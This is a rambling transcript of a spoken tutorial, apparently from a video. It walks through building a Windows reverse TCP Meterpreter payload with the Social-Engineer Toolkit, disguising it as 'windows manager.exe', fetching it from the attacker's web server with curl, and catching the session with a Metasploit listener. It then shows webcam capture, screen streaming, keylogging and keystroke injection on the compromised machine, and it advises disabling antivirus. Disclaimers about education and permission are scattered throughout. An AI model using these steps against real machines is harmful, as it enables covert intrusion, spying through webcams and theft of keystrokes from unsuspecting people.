So, hi. Today we'll see how to use set toolkit, social engineering toolkit to exploit Windows. Well, here, if you see properly, that we are going to create a payload using set again, and that payload will be sent to a victim machine, just like how we did Netcat in the previous video. And from there, we can have a remote connection or reverse TCP connection from the uh, victim species, which is Windows, to Kali Linux, which is attacker's point of view. Now, how do you establish these connections? I'm sorry if my audio is so bad, but I don't have a good audio mic. So how do you actually do this type of stuff? So basically, we'll open set toolkit and we'll use a tool called a set toolkit and social engineering toolkit, and we'll create a payload and put a listener as an RIP, and then that's once the payload is ready, an exe file will be created. That exe file will be sent to the victim, and from there, by just running the whole thing, that's it done. You don't actually, just like Netcat, here you can do much more stuff. Like it's a privileged one, more than Netcat. Netcat is for just for basics, and now this is something advanced. Like we're going in the next level of hacking. And make sure, please, this is just for educational purposes. Do not use this in the real life, or else you'll get caught. And I'm not the responsible for this, for sure. Okay, so let's start. So as you see, we have Kali Linux open. I'll just my password. Oh, incorrect password. Sorry. Yep. So as you see, we have Kali Linux, and there now, if you see, one second. Ami, അടുപ്പില്ല ഇതുമില്ല Ami. Okay. As you see, like we have right now, we'll just clear it out. Let's get to our video. So right now, if you see, let's start the toolkit. First, we have to be a root user, and now after being a root user, let's open set toolkit. Oh, maybe the password was wrong. Sorry for the audio. Okay, so now let's open set toolkit. Done. Oh, it's opening set toolkit now. I mean, yeah, obviously. Now in this, let's select the first one, social engineering attacks. And in that, let's choose the fourth option, which is create a payload and a listener. In that, let's click option 2, which is Windows reverse TCP meter repeater, because that's where we can have a connection with from Windows to Kali, and it's a shell. So I mean meter repeater, so not a shell, but it's a meter repeater where you can give commands and run the stuff. So let's choose option 2 and go ahead. The IP address is the listener host, which is ours, which is basically 192.168.0.111. That's the listener host. The port will be obviously default port. Please use the port 44. Okay, like the 4444. Okay, the payload is being generated. Let's see what happens. I mostly believe it will take some time, but I'll tell you what happens now. See, once we create the payload, we'll just send that payload to the victim. But before that, there should be a connection happening. There should be listeners who will be listening to the port, the application, who are just like clicks on it. I mean, click and boom. That's how it should happen, no? So this payload right now, which we're creating, will do that stuff. And after that, we will create listener port in our Metasploit. Yeah, okay. No, not now, not now. I can do it manually. It's fine, thank you. Okay, let's first copy this. Copy selection. Press enter. Done. Now let's exit it. Control C. Clear. ls. Control Shift P. Oh, we already have it. Sorry. Um, cat. Okay, cat. Okay, so we have it. So we have the file. We have the exe file. Now what we have to do is quite simple. MV, or not this. Sorry. Move that file from here to /var/www/html. Like basically assigning to the Apache's default location. Now using Apache, we'll download the exe file and then further do the exploits. Press enter. Done. Now we have moved towards there. Let's find whether it's actually there or not. There you go. There you have the payload.exe, which is the one which we wanted. Like that's the main exe file. Now let's go to the Windows machine. So let's go here, and yeah, default your browser won't let you download that. So you have to go to a folder and then type cmd. Yeah, there's another way too. You can actually mirror the exe file, making it as a legit file. Let's try once. By the way, please make sure during this exploit, during a self-testing exploit, make sure that your security, your antivirus security is off, because this won't let you install any malicious software. Oh, it's mine is off. Peace out. First we'll try it in our browsers and then we'll go there. Server's running and then like payload.exe done. Keep. Uh, I told you. We'll have to use the command prompt. Curl http 192.168.0.111 slash payload.exe, and output file will be windows manager.exe. Done. Boom, we got it. Now what are you going to do? Go to the folder. Like this is the folder, right? You have it over here. Now, before clicking it, please make sure that you have a listener port running in your console. To do that, press MSF console -q quiet, which means we don't want that the animation stuff which takes a lot of time. This will hardly take around some 10-15 seconds. By the way, my PC is kind of low end, so it will take time. But in yours, if you have a good PC, peace out. Gotta wait, I guess. Now what we'll do is like we'll set the payload, we'll set the exploit as multi-handler, and we'll use the payload Windows meter and reverse TCP, and then we'll set the LOS, which is our IP, and then done, exploit it. Done. Here we go. Let's clear the screen just to make sure that we are going correctly. Now let's set the exploit as exploit multi-handler. Oh, so not set actually, it's use. I'm some kind of confused. Use exploit, yeah. Now let's set payload Windows interpreter reverse TCP. Done. Now let's show the options what do we have right now. Everything's ready. We need to just put a LOS. Set LOS. I'm just learning how to type other things. 192.168.0.111, which is our IP. Like we are the listener now. Done. Now let's see the options. So everything is said, then directly exploit it. Type exploit to run the whole code. And then here, execute the file. It will ask for a permission though. Please make sure you give it one. What? This guy should be working right now. Oh yes. See. Yes, we are onto the PC. The IP which you saw here is basically like in Windows IP, like Windows. It's Windows IP, the Windows machine IP, the victim's IP basically. And the IP here is our IP, which is running in a listener in this port. And in the same port, there is also the receiver. And now there's a reverse TCP. So basically, this will be the server. The server will be sending a request to the client. That's it. That's it. I mean, you got it now. Now what? We have the PC right now, man. You have the control over it. Let me give you an example. Webcam list to see how many webcams are available. You'll be shocked to see my face here. The EG webcam. Let's get webcam. I think help will actually webcam snap. Yeah, okay, webcam snap. I mean, not I know that it was snap, but I want to see which cam I'll do it. Because we have 3 cams. I told you. My other cam is actually working, not this. I mean, the IV I have some paid software called as IV cam, so it's fine. Chill. Okay, then what else? Sorry, one second. I have an idea. Oh, oh no, it just goes to the same thing. Anyways, no problem. We have the file right now. If you see, we have got two photos of my cam. If you have access, if you have a laptop, then man, your whole thing is done. I mean, that's it. What can we do next? Keyboard clear. So, oh, share screen, I guess. No, you can actually share a screen. So, clear, unlock, shell, key scan, screen share. And right now, if you see, and my screen is actually getting shared. I'll tell you how. Yeah, it will take some time. My processor is giving a high load. I mean, it should load my browser. I have given the configuration just for 2 GB. There you go. You can see my PC like a real-time scan, and you don't know what's happening over there. Right? I don't have two laptops, so if I had one, I would have done it, but I don't have it. But if I have it, maybe it will work. See, if you see here, it's 100. Now this will become 100. Like it's frame drop, so basically you can't help it. Anyways, this is how it works. And now we'll just close the window, and then here we'll cancel the session, and then we'll go help again. What else we can, see? A webcam stream, correct? Webcam stream. My EDM cam will not actually be done. It won't defaultly go though, but I guess that yeah, this will come down. Sorry for that. But yes, if you have a laptop, you can do this stuff. It will be so crazy to to use the anyone's camera over there. I mean, until you have the permission. Not just that, you have lots of things to do. Like you can send some keystrokes or something like that. Yes, keyboard send. Okay. So I'm just I'm doing with you. This is the second time I'm doing. So string high, done. So what's happening over here? Let me just give my cursor over here, and now let's go there and then do the same stuff. Did you type high? No, I didn't type high. Shit. Fine, no problem. I mean, there's more, Keyboard sends keystrokes, start capturing keystrokes. Okay, capture the keystrokes, that's good. What else I can do? I can reboot the whole PC. That's great. And there's more. There's a lot to, just explore it. And just like Netcat, you can actually create a shell, which in fact gives you the access to see the whole PC. I mean, to access the file basically. And now, and there you go. That's fine. Same song again, not again, man. I'm so sorry. So this is how Metasploit is widely used to do this kind of stuff. And please make sure don't use this for a real exploits. I mean, you should have an explicit permission to do this stuff. Except you should have an explicit permission to do this stuff. Please do not exploit anyone's privacy. I mean, see, even your privacy is under your control. If I try to exploit you, obviously you get angry, and the same goes to them also. So please make sure that you don't do this for any wrong purposes. This is just to show you, demonstrate to you that how an hacker can actually get into your PC. And you might think like, how will this actually happen with a local IP? If they have a static IP, this is basically dynamic IP, which changes according to the network. But if you have a static IP and you have a static router, peace out, man. He can do whatever he wants. He can run a whole server online and then host it up there, and then anyone can access that. So please make sure don't do this for any wrong purposes. I mean, apart from education purpose, apart from teaching someone, please. Thank you. Bye.